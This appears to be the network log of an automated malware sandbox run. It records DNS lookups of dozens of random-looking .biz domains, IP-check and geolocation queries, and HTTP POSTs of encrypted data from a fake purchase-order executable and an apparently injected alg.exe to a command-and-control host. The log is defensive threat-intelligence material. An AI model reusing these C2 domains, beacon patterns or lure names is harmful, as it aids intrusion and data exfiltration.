                                                                                                                                                                                                                                    Dec 31, 2024 09:05:14.022413969 CET53632191.1.1.1192.168.2.4
                                                                                                                                                                                                                                    Dec 31, 2024 09:05:14.023228884 CET6339753192.168.2.41.1.1.1
                                                                                                                                                                                                                                    Dec 31, 2024 09:05:14.030936003 CET53633971.1.1.1192.168.2.4
                                                                                                                                                                                                                                    Dec 31, 2024 09:05:15.571506977 CET5465953192.168.2.41.1.1.1
                                                                                                                                                                                                                                    Dec 31, 2024 09:05:15.578566074 CET53546591.1.1.1192.168.2.4
                                                                                                                                                                                                                                    Dec 31, 2024 09:05:15.579080105 CET5672653192.168.2.41.1.1.1
                                                                                                                                                                                                                                    Dec 31, 2024 09:05:15.586034060 CET53567261.1.1.1192.168.2.4
                                                                                                                                                                                                                                    Dec 31, 2024 09:05:15.603377104 CET5017553192.168.2.41.1.1.1
                                                                                                                                                                                                                                    Dec 31, 2024 09:05:15.610614061 CET53501751.1.1.1192.168.2.4
                                                                                                                                                                                                                                    Dec 31, 2024 09:05:20.881325006 CET6049753192.168.2.41.1.1.1
                                                                                                                                                                                                                                    Dec 31, 2024 09:05:20.888358116 CET53604971.1.1.1192.168.2.4
                                                                                                                                                                                                                                    Dec 31, 2024 09:05:26.001919985 CET5788653192.168.2.41.1.1.1
                                                                                                                                                                                                                                    Dec 31, 2024 09:05:26.009372950 CET53578861.1.1.1192.168.2.4
                                                                                                                                                                                                                                    Dec 31, 2024 09:05:26.973227024 CET5436753192.168.2.41.1.1.1
                                                                                                                                                                                                                                    Dec 31, 2024 09:05:27.155514956 CET53543671.1.1.1192.168.2.4
                                                                                                                                                                                                                                    Dec 31, 2024 09:05:28.681422949 CET5025853192.168.2.41.1.1.1
                                                                                                                                                                                                                                    Dec 31, 2024 09:05:28.688427925 CET53502581.1.1.1192.168.2.4
                                                                                                                                                                                                                                    Dec 31, 2024 09:05:29.436032057 CET5356753192.168.2.41.1.1.1
                                                                                                                                                                                                                                    Dec 31, 2024 09:05:29.442986012 CET53535671.1.1.1192.168.2.4
                                                                                                                                                                                                                                    Dec 31, 2024 09:05:29.912750006 CET5117953192.168.2.41.1.1.1
                                                                                                                                                                                                                                    Dec 31, 2024 09:05:29.920113087 CET53511791.1.1.1192.168.2.4
                                                                                                                                                                                                                                    Dec 31, 2024 09:05:38.908292055 CET5515053192.168.2.41.1.1.1
                                                                                                                                                                                                                                    Dec 31, 2024 09:05:38.915432930 CET53551501.1.1.1192.168.2.4
                                                                                                                                                                                                                                    Dec 31, 2024 09:06:02.967417002 CET6284853192.168.2.41.1.1.1
                                                                                                                                                                                                                                    Dec 31, 2024 09:06:02.975606918 CET53628481.1.1.1192.168.2.4
                                                                                                                                                                                                                                    Dec 31, 2024 09:06:04.888767958 CET6314753192.168.2.41.1.1.1
                                                                                                                                                                                                                                    Dec 31, 2024 09:06:04.895874977 CET53631471.1.1.1192.168.2.4
                                                                                                                                                                                                                                    Dec 31, 2024 09:06:06.503551960 CET5821953192.168.2.41.1.1.1
                                                                                                                                                                                                                                    Dec 31, 2024 09:06:06.511674881 CET53582191.1.1.1192.168.2.4
                                                                                                                                                                                                                                    Dec 31, 2024 09:06:07.519160986 CET5417453192.168.2.41.1.1.1
                                                                                                                                                                                                                                    Dec 31, 2024 09:06:07.526576996 CET53541741.1.1.1192.168.2.4
                                                                                                                                                                                                                                    Dec 31, 2024 09:06:09.024770975 CET6296053192.168.2.41.1.1.1
                                                                                                                                                                                                                                    Dec 31, 2024 09:06:09.032285929 CET53629601.1.1.1192.168.2.4
                                                                                                                                                                                                                                    Dec 31, 2024 09:06:09.766015053 CET5476053192.168.2.41.1.1.1
                                                                                                                                                                                                                                    Dec 31, 2024 09:06:09.773904085 CET53547601.1.1.1192.168.2.4
                                                                                                                                                                                                                                    Dec 31, 2024 09:06:10.770970106 CET5997353192.168.2.41.1.1.1
                                                                                                                                                                                                                                    Dec 31, 2024 09:06:10.778565884 CET53599731.1.1.1192.168.2.4
                                                                                                                                                                                                                                    Dec 31, 2024 09:06:11.805351973 CET4994553192.168.2.41.1.1.1
                                                                                                                                                                                                                                    Dec 31, 2024 09:06:11.812114954 CET53499451.1.1.1192.168.2.4
                                                                                                                                                                                                                                    Dec 31, 2024 09:06:12.361407042 CET6366553192.168.2.41.1.1.1
                                                                                                                                                                                                                                    Dec 31, 2024 09:06:12.368541956 CET53636651.1.1.1192.168.2.4
                                                                                                                                                                                                                                    Dec 31, 2024 09:06:13.219654083 CET5674453192.168.2.41.1.1.1
                                                                                                                                                                                                                                    Dec 31, 2024 09:06:13.226696014 CET53567441.1.1.1192.168.2.4
                                                                                                                                                                                                                                    Dec 31, 2024 09:06:14.941992044 CET5144053192.168.2.41.1.1.1
                                                                                                                                                                                                                                    Dec 31, 2024 09:06:14.948916912 CET53514401.1.1.1192.168.2.4
                                                                                                                                                                                                                                    Dec 31, 2024 09:06:15.635586977 CET5731553192.168.2.41.1.1.1
                                                                                                                                                                                                                                    Dec 31, 2024 09:06:15.642781019 CET53573151.1.1.1192.168.2.4
                                                                                                                                                                                                                                    Dec 31, 2024 09:06:16.637470007 CET5500153192.168.2.41.1.1.1
                                                                                                                                                                                                                                    Dec 31, 2024 09:06:16.644560099 CET53550011.1.1.1192.168.2.4
                                                                                                                                                                                                                                    Dec 31, 2024 09:06:17.639342070 CET5727353192.168.2.41.1.1.1
                                                                                                                                                                                                                                    Dec 31, 2024 09:06:17.647010088 CET53572731.1.1.1192.168.2.4
                                                                                                                                                                                                                                    Dec 31, 2024 09:06:18.411299944 CET5203253192.168.2.41.1.1.1
                                                                                                                                                                                                                                    Dec 31, 2024 09:06:18.417994976 CET53520321.1.1.1192.168.2.4
                                                                                                                                                                                                                                    Dec 31, 2024 09:06:19.647521973 CET6481853192.168.2.41.1.1.1
                                                                                                                                                                                                                                    Dec 31, 2024 09:06:19.654567957 CET53648181.1.1.1192.168.2.4
                                                                                                                                                                                                                                    Dec 31, 2024 09:06:21.600910902 CET5151853192.168.2.41.1.1.1
                                                                                                                                                                                                                                    Dec 31, 2024 09:06:21.608053923 CET53515181.1.1.1192.168.2.4
                                                                                                                                                                                                                                    Dec 31, 2024 09:06:22.669192076 CET5036553192.168.2.41.1.1.1
                                                                                                                                                                                                                                    Dec 31, 2024 09:06:22.677326918 CET53503651.1.1.1192.168.2.4
                                                                                                                                                                                                                                    Dec 31, 2024 09:06:24.605668068 CET5646353192.168.2.41.1.1.1
                                                                                                                                                                                                                                    Dec 31, 2024 09:06:24.785345078 CET53564631.1.1.1192.168.2.4
                                                                                                                                                                                                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                                                                    Dec 31, 2024 09:05:06.261581898 CET192.168.2.41.1.1.10x9df8Standard query (0)pywolwnvd.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                    Dec 31, 2024 09:05:06.619533062 CET192.168.2.41.1.1.10x8ce6Standard query (0)pywolwnvd.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                    Dec 31, 2024 09:05:07.688419104 CET192.168.2.41.1.1.10x1c54Standard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                    Dec 31, 2024 09:05:08.009258032 CET192.168.2.41.1.1.10xff64Standard query (0)ssbzmoy.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                    Dec 31, 2024 09:05:09.794758081 CET192.168.2.41.1.1.10xa828Standard query (0)cvgrf.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                    Dec 31, 2024 09:05:10.811642885 CET192.168.2.41.1.1.10xcedaStandard query (0)npukfztj.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                    Dec 31, 2024 09:05:11.347551107 CET192.168.2.41.1.1.10xfa0aStandard query (0)przvgke.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                    Dec 31, 2024 09:05:12.391901970 CET192.168.2.41.1.1.10x26f5Standard query (0)ww7.przvgke.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                    Dec 31, 2024 09:05:13.097170115 CET192.168.2.41.1.1.10x7f08Standard query (0)ww12.przvgke.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                    Dec 31, 2024 09:05:14.015062094 CET192.168.2.41.1.1.10xbff6Standard query (0)zlenh.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                    Dec 31, 2024 09:05:14.023228884 CET192.168.2.41.1.1.10x36cfStandard query (0)knjghuig.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                    Dec 31, 2024 09:05:15.571506977 CET192.168.2.41.1.1.10x663fStandard query (0)uhxqin.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                    Dec 31, 2024 09:05:15.579080105 CET192.168.2.41.1.1.10x2467Standard query (0)anpmnmxo.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                    Dec 31, 2024 09:05:15.603377104 CET192.168.2.41.1.1.10x4bdfStandard query (0)lpuegx.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                    Dec 31, 2024 09:05:20.881325006 CET192.168.2.41.1.1.10x65ddStandard query (0)reallyfreegeoip.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                    Dec 31, 2024 09:05:26.001919985 CET192.168.2.41.1.1.10x413aStandard query (0)pywolwnvd.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                    Dec 31, 2024 09:05:26.973227024 CET192.168.2.41.1.1.10x3748Standard query (0)ssbzmoy.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                    Dec 31, 2024 09:05:28.681422949 CET192.168.2.41.1.1.10xd171Standard query (0)cvgrf.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                    Dec 31, 2024 09:05:29.436032057 CET192.168.2.41.1.1.10xd646Standard query (0)npukfztj.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                    Dec 31, 2024 09:05:29.912750006 CET192.168.2.41.1.1.10x33c3Standard query (0)przvgke.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                    Dec 31, 2024 09:05:38.908292055 CET192.168.2.41.1.1.10x3e7bStandard query (0)vjaxhpbji.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                    Dec 31, 2024 09:06:02.967417002 CET192.168.2.41.1.1.10x6db2Standard query (0)xlfhhhm.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                    Dec 31, 2024 09:06:04.888767958 CET192.168.2.41.1.1.10xa9bbStandard query (0)ifsaia.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                    Dec 31, 2024 09:06:06.503551960 CET192.168.2.41.1.1.10x1f69Standard query (0)saytjshyf.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                    Dec 31, 2024 09:06:07.519160986 CET192.168.2.41.1.1.10x6a37Standard query (0)vcddkls.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                    Dec 31, 2024 09:06:09.024770975 CET192.168.2.41.1.1.10xd32bStandard query (0)fwiwk.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                    Dec 31, 2024 09:06:09.766015053 CET192.168.2.41.1.1.10xea78Standard query (0)ww7.fwiwk.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                    Dec 31, 2024 09:06:10.770970106 CET192.168.2.41.1.1.10x8324Standard query (0)tbjrpv.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                    Dec 31, 2024 09:06:11.805351973 CET192.168.2.41.1.1.10x2713Standard query (0)deoci.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                    Dec 31, 2024 09:06:12.361407042 CET192.168.2.41.1.1.10x6417Standard query (0)gytujflc.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                    Dec 31, 2024 09:06:13.219654083 CET192.168.2.41.1.1.10xb67cStandard query (0)qaynky.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                    Dec 31, 2024 09:06:14.941992044 CET192.168.2.41.1.1.10x29aaStandard query (0)bumxkqgxu.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                    Dec 31, 2024 09:06:15.635586977 CET192.168.2.41.1.1.10x7b05Standard query (0)dwrqljrr.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                    Dec 31, 2024 09:06:16.637470007 CET192.168.2.41.1.1.10x7fcStandard query (0)nqwjmb.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                    Dec 31, 2024 09:06:17.639342070 CET192.168.2.41.1.1.10xaa5dStandard query (0)ytctnunms.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                    Dec 31, 2024 09:06:18.411299944 CET192.168.2.41.1.1.10xdd8fStandard query (0)myups.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                    Dec 31, 2024 09:06:19.647521973 CET192.168.2.41.1.1.10xa155Standard query (0)oshhkdluh.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                    Dec 31, 2024 09:06:21.600910902 CET192.168.2.41.1.1.10x2d4Standard query (0)yunalwv.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                    Dec 31, 2024 09:06:22.669192076 CET192.168.2.41.1.1.10x1ed4Standard query (0)jpskm.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                    Dec 31, 2024 09:06:24.605668068 CET192.168.2.41.1.1.10x5261Standard query (0)lrxdmhrr.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                                                                    Dec 31, 2024 09:05:06.269162893 CET1.1.1.1192.168.2.40x9df8No error (0)pywolwnvd.biz54.244.188.177A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                    Dec 31, 2024 09:05:06.627377987 CET1.1.1.1192.168.2.40x8ce6No error (0)pywolwnvd.biz54.244.188.177A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                    Dec 31, 2024 09:05:07.695111990 CET1.1.1.1192.168.2.40x1c54No error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                    Dec 31, 2024 09:05:07.695111990 CET1.1.1.1192.168.2.40x1c54No error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                    Dec 31, 2024 09:05:07.695111990 CET1.1.1.1192.168.2.40x1c54No error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                    Dec 31, 2024 09:05:07.695111990 CET1.1.1.1192.168.2.40x1c54No error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                    Dec 31, 2024 09:05:07.695111990 CET1.1.1.1192.168.2.40x1c54No error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                    Dec 31, 2024 09:05:07.695111990 CET1.1.1.1192.168.2.40x1c54No error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                    Dec 31, 2024 09:05:08.016556978 CET1.1.1.1192.168.2.40xff64No error (0)ssbzmoy.biz18.141.10.107A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                    Dec 31, 2024 09:05:09.802153111 CET1.1.1.1192.168.2.40xa828No error (0)cvgrf.biz54.244.188.177A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                    Dec 31, 2024 09:05:10.818840027 CET1.1.1.1192.168.2.40xcedaNo error (0)npukfztj.biz44.221.84.105A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                    Dec 31, 2024 09:05:11.354835987 CET1.1.1.1192.168.2.40xfa0aNo error (0)przvgke.biz72.52.178.23A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                    Dec 31, 2024 09:05:12.399024010 CET1.1.1.1192.168.2.40x26f5No error (0)ww7.przvgke.biz76899.bodis.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                    Dec 31, 2024 09:05:12.399024010 CET1.1.1.1192.168.2.40x26f5No error (0)76899.bodis.com199.59.243.227A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                    Dec 31, 2024 09:05:13.106596947 CET1.1.1.1192.168.2.40x7f08No error (0)ww12.przvgke.biz084725.parkingcrew.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                    Dec 31, 2024 09:05:13.106596947 CET1.1.1.1192.168.2.40x7f08No error (0)084725.parkingcrew.net13.248.148.254A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                    Dec 31, 2024 09:05:13.106596947 CET1.1.1.1192.168.2.40x7f08No error (0)084725.parkingcrew.net76.223.26.96A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                    Dec 31, 2024 09:05:14.022413969 CET1.1.1.1192.168.2.40xbff6Name error (3)zlenh.biznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                    Dec 31, 2024 09:05:14.030936003 CET1.1.1.1192.168.2.40x36cfNo error (0)knjghuig.biz18.141.10.107A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                    Dec 31, 2024 09:05:15.578566074 CET1.1.1.1192.168.2.40x663fName error (3)uhxqin.biznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                    Dec 31, 2024 09:05:15.586034060 CET1.1.1.1192.168.2.40x2467Name error (3)anpmnmxo.biznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                    Dec 31, 2024 09:05:15.610614061 CET1.1.1.1192.168.2.40x4bdfNo error (0)lpuegx.biz82.112.184.197A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                    Dec 31, 2024 09:05:20.888358116 CET1.1.1.1192.168.2.40x65ddNo error (0)reallyfreegeoip.org188.114.96.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                    Dec 31, 2024 09:05:20.888358116 CET1.1.1.1192.168.2.40x65ddNo error (0)reallyfreegeoip.org188.114.97.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                    Dec 31, 2024 09:05:26.009372950 CET1.1.1.1192.168.2.40x413aNo error (0)pywolwnvd.biz54.244.188.177A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                    Dec 31, 2024 09:05:27.155514956 CET1.1.1.1192.168.2.40x3748No error (0)ssbzmoy.biz18.141.10.107A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                    Dec 31, 2024 09:05:28.688427925 CET1.1.1.1192.168.2.40xd171No error (0)cvgrf.biz54.244.188.177A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                    Dec 31, 2024 09:05:29.442986012 CET1.1.1.1192.168.2.40xd646No error (0)npukfztj.biz44.221.84.105A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                    Dec 31, 2024 09:05:29.920113087 CET1.1.1.1192.168.2.40x33c3No error (0)przvgke.biz72.52.178.23A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                    Dec 31, 2024 09:05:38.915432930 CET1.1.1.1192.168.2.40x3e7bNo error (0)vjaxhpbji.biz82.112.184.197A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                    Dec 31, 2024 09:06:02.975606918 CET1.1.1.1192.168.2.40x6db2No error (0)xlfhhhm.biz47.129.31.212A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                    Dec 31, 2024 09:06:04.895874977 CET1.1.1.1192.168.2.40xa9bbNo error (0)ifsaia.biz13.251.16.150A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                    Dec 31, 2024 09:06:06.511674881 CET1.1.1.1192.168.2.40x1f69No error (0)saytjshyf.biz44.221.84.105A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                    Dec 31, 2024 09:06:07.526576996 CET1.1.1.1192.168.2.40x6a37No error (0)vcddkls.biz18.141.10.107A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                    Dec 31, 2024 09:06:09.032285929 CET1.1.1.1192.168.2.40xd32bNo error (0)fwiwk.biz72.52.178.23A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                    Dec 31, 2024 09:06:09.773904085 CET1.1.1.1192.168.2.40xea78No error (0)ww7.fwiwk.biz76899.bodis.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                    Dec 31, 2024 09:06:09.773904085 CET1.1.1.1192.168.2.40xea78No error (0)76899.bodis.com199.59.243.227A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                    Dec 31, 2024 09:06:10.778565884 CET1.1.1.1192.168.2.40x8324No error (0)tbjrpv.biz34.246.200.160A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                    Dec 31, 2024 09:06:11.812114954 CET1.1.1.1192.168.2.40x2713No error (0)deoci.biz34.227.7.138A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                    Dec 31, 2024 09:06:12.368541956 CET1.1.1.1192.168.2.40x6417No error (0)gytujflc.biz208.117.43.225A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                    Dec 31, 2024 09:06:13.226696014 CET1.1.1.1192.168.2.40xb67cNo error (0)qaynky.biz13.251.16.150A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                    Dec 31, 2024 09:06:14.948916912 CET1.1.1.1192.168.2.40x29aaNo error (0)bumxkqgxu.biz44.221.84.105A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                    Dec 31, 2024 09:06:15.642781019 CET1.1.1.1192.168.2.40x7b05No error (0)dwrqljrr.biz54.244.188.177A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                    Dec 31, 2024 09:06:16.644560099 CET1.1.1.1192.168.2.40x7fcNo error (0)nqwjmb.biz35.164.78.200A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                    Dec 31, 2024 09:06:17.647010088 CET1.1.1.1192.168.2.40xaa5dNo error (0)ytctnunms.biz3.94.10.34A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                    Dec 31, 2024 09:06:18.417994976 CET1.1.1.1192.168.2.40xdd8fNo error (0)myups.biz165.160.13.20A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                    Dec 31, 2024 09:06:18.417994976 CET1.1.1.1192.168.2.40xdd8fNo error (0)myups.biz165.160.15.20A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                    Dec 31, 2024 09:06:19.654567957 CET1.1.1.1192.168.2.40xa155No error (0)oshhkdluh.biz54.244.188.177A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                    Dec 31, 2024 09:06:21.608053923 CET1.1.1.1192.168.2.40x2d4No error (0)yunalwv.biz208.117.43.225A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                    Dec 31, 2024 09:06:22.677326918 CET1.1.1.1192.168.2.40x1ed4No error (0)jpskm.biz18.246.231.120A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                    Dec 31, 2024 09:06:24.785345078 CET1.1.1.1192.168.2.40x5261No error (0)lrxdmhrr.biz54.244.188.177A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                    • reallyfreegeoip.org
                                                                                                                                                                                                                                    • pywolwnvd.biz
                                                                                                                                                                                                                                    • checkip.dyndns.org
                                                                                                                                                                                                                                    • ssbzmoy.biz
                                                                                                                                                                                                                                    • cvgrf.biz
                                                                                                                                                                                                                                    • npukfztj.biz
                                                                                                                                                                                                                                    • przvgke.biz
                                                                                                                                                                                                                                    • ww7.przvgke.biz
                                                                                                                                                                                                                                    • ww12.przvgke.biz
                                                                                                                                                                                                                                    • knjghuig.biz
                                                                                                                                                                                                                                    • lpuegx.biz
                                                                                                                                                                                                                                    • vjaxhpbji.biz
                                                                                                                                                                                                                                    • xlfhhhm.biz
                                                                                                                                                                                                                                    • ifsaia.biz
                                                                                                                                                                                                                                    • saytjshyf.biz
                                                                                                                                                                                                                                    • vcddkls.biz
                                                                                                                                                                                                                                    • fwiwk.biz
                                                                                                                                                                                                                                    • ww7.fwiwk.biz
                                                                                                                                                                                                                                    • tbjrpv.biz
                                                                                                                                                                                                                                    • deoci.biz
                                                                                                                                                                                                                                    • gytujflc.biz
                                                                                                                                                                                                                                    • qaynky.biz
                                                                                                                                                                                                                                    • bumxkqgxu.biz
                                                                                                                                                                                                                                    • dwrqljrr.biz
                                                                                                                                                                                                                                    • nqwjmb.biz
                                                                                                                                                                                                                                    • ytctnunms.biz
                                                                                                                                                                                                                                    • myups.biz
                                                                                                                                                                                                                                    • oshhkdluh.biz
                                                                                                                                                                                                                                    • yunalwv.biz
                                                                                                                                                                                                                                    • jpskm.biz
                                                                                                                                                                                                                                    • lrxdmhrr.biz
                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                    0192.168.2.44973854.244.188.177808160C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe
                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                    Dec 31, 2024 09:05:07.067162991 CET358OUTPOST /haobwbcukjixe HTTP/1.1
                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                                                                    Host: pywolwnvd.biz
                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                    Content-Length: 842
                                                                                                                                                                                                                                    Dec 31, 2024 09:05:07.067193985 CET842OUTData Raw: c3 f6 7e 71 27 c5 59 48 3e 03 00 00 c1 9a 6a f1 86 42 82 21 de f1 cd e5 b3 c5 21 d3 ab 33 82 87 3a c4 8f 02 8f a3 2f 6c d9 e7 dc 85 99 15 bc 93 c4 93 7d 6f b2 63 da f4 be 98 a0 1f dc b9 68 e5 0f 56 b7 b2 1f 4b 9c 74 ad 51 77 4a 70 40 3c be 1b 7e
                                                                                                                                                                                                                                    Data Ascii: ~q'YH>jB!!3:/l}ochVKtQwJp@<~7$zd-:v}D|/OKl7uaY 7 \C'2.q\dylD98>MOmBGCrHd|ve8d>z4c.q!
                                                                                                                                                                                                                                    Dec 31, 2024 09:05:07.773703098 CET413INHTTP/1.1 200 OK
                                                                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                                                                    Date: Tue, 31 Dec 2024 08:05:07 GMT
                                                                                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                    Set-Cookie: btst=bc087f28b3104ee26c32ad7c8c0a0a74|8.46.123.189|1735632307|1735632307|0|1|0; path=/; domain=.pywolwnvd.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                    Set-Cookie: snkz=8.46.123.189; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                    Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                    1192.168.2.44973954.244.188.177807304C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                    Dec 31, 2024 09:05:07.236408949 CET353OUTPOST /mshapsve HTTP/1.1
                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                                                                    Host: pywolwnvd.biz
                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                    Content-Length: 778
                                                                                                                                                                                                                                    Dec 31, 2024 09:05:07.236438036 CET778OUTData Raw: 5c 4d 3e 50 d8 b1 c6 da fe 02 00 00 b1 8d 78 bf 83 04 71 fd cf e0 9a f7 86 31 b9 17 3e 71 d3 35 0a 5a b9 b4 2e f9 56 e4 dd ac 88 93 4f 20 1b 9d 36 19 02 ff 3a 85 14 28 c0 ff 22 c9 4d 5a a5 d4 77 9d 09 a1 81 62 09 8c 48 8f bc 82 01 26 54 be 4b 38
                                                                                                                                                                                                                                    Data Ascii: \M>Pxq1>q5Z.VO 6:("MZwbH&TK8-%W`;6=w'-5qRo.]U2/z\Z,E5TgR04-3V6)nok"#yk_-=8G4M$#=vX6plL
                                                                                                                                                                                                                                    Dec 31, 2024 09:05:07.947119951 CET413INHTTP/1.1 200 OK
                                                                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                                                                    Date: Tue, 31 Dec 2024 08:05:07 GMT
                                                                                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                    Set-Cookie: btst=15a9855571d9bd2701eff9739d078246|8.46.123.189|1735632307|1735632307|0|1|0; path=/; domain=.pywolwnvd.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                    Set-Cookie: snkz=8.46.123.189; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                    Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
